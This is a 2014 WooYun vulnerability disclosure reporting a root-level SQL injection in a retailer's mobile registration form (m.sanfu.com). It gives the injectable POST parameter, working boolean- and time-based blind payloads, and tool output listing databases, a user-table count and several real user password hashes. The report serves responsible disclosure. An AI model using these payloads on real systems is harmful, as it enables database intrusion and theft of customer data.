当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058677

漏洞标题:三幅百货某处ROOT注入(近四百万用户数据告急)

相关厂商:sanfu.com

漏洞作者: Comer

提交时间:2014-04-27 19:13

修复时间:2014-06-11 19:13

公开时间:2014-06-11 19:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-27: 细节已通知厂商并且等待厂商处理中
2014-04-28: 厂商已经确认,细节仅向厂商公开
2014-05-08: 细节向核心白帽子及相关领域专家公开
2014-05-18: 细节向普通白帽子公开
2014-05-28: 细节向实习白帽子公开
2014-06-11: 细节向公众公开

简要描述:

Thank You For Hearing Me - SinéAd O Connor ...

详细说明:

看到厂商活动第一个就是三福,就来逛逛。仅测试。看了下被报的貌似都是主站的,但愿没重复。

http://m.sanfu.com/reg/newCardPast.htm 
POS参数: user.curcusid=C7514492&user.verify=444554


order、union都不行...试试盲注

#1.png


user.curcusid=C7514492' AND 2=2&user.verify=444554  (布尔类型注入,忘记先试单引号)

#1.png

试了两次sleep从响应时间中得出有时间注入(多查询条件)

user.curcusid=C7514492' AND SLEEP(3) AnD 2='2&user.verify=444554


缓慢的响应时间告诉我不成...

#2.png

漏洞证明:

Place: POST
Parameter: user.curcusid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user.curcusid=C7514492' AND 5870=5870 AND 'oDlZ'='oDlZ&user.verify=444554
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user.curcusid=C7514492' AND SLEEP(5) AND 'jqcV'='jqcV&user.verify=444554


N多库

#3.png

web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] c_sanfu
[*] information_schema
[*] mysql
[*] test
[*] wp


count一下eb_users

Database: c_sanfu
+----------+---------+
| Table | Entries |
+----------+---------+
| eb_users | 3642963 |
+----------+---------+


透视了几个user

+-----------+-------------------------------------------+
| user_rank | user_password |
+-----------+-------------------------------------------+
| 1 | e10adc3949ba59abbe56e057f20f883e |
| 1 | ae5df06521199dd833689b41ef43af9a |
| 1 | d437df002f7a5c8555c107af8a643977 |
| 1 | 0c039a038da81afefa8da3d3d1fd3c63 |
| 1 | 8ce1fa948dcedd72e2c83a37af7408e0 |
+-----------+-------------------------------------------+

root权限

web application technology: Nginx, JSP
back-end DBMS: MySQL >= 5.0.0
[INFO] testing if current user is DBA
[INFO] fetching current user
[INFO] resumed: root@%
current user is DBA: True


以上仅为测试,未带走丝毫数据,请知悉。

修复方案:

有礼物? 请速度修复且全面排查是否有shell迹象。

版权声明:转载请注明来源 Comer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-04-28 08:44

厂商回复:

感谢提交,修复中

最新状态:

暂无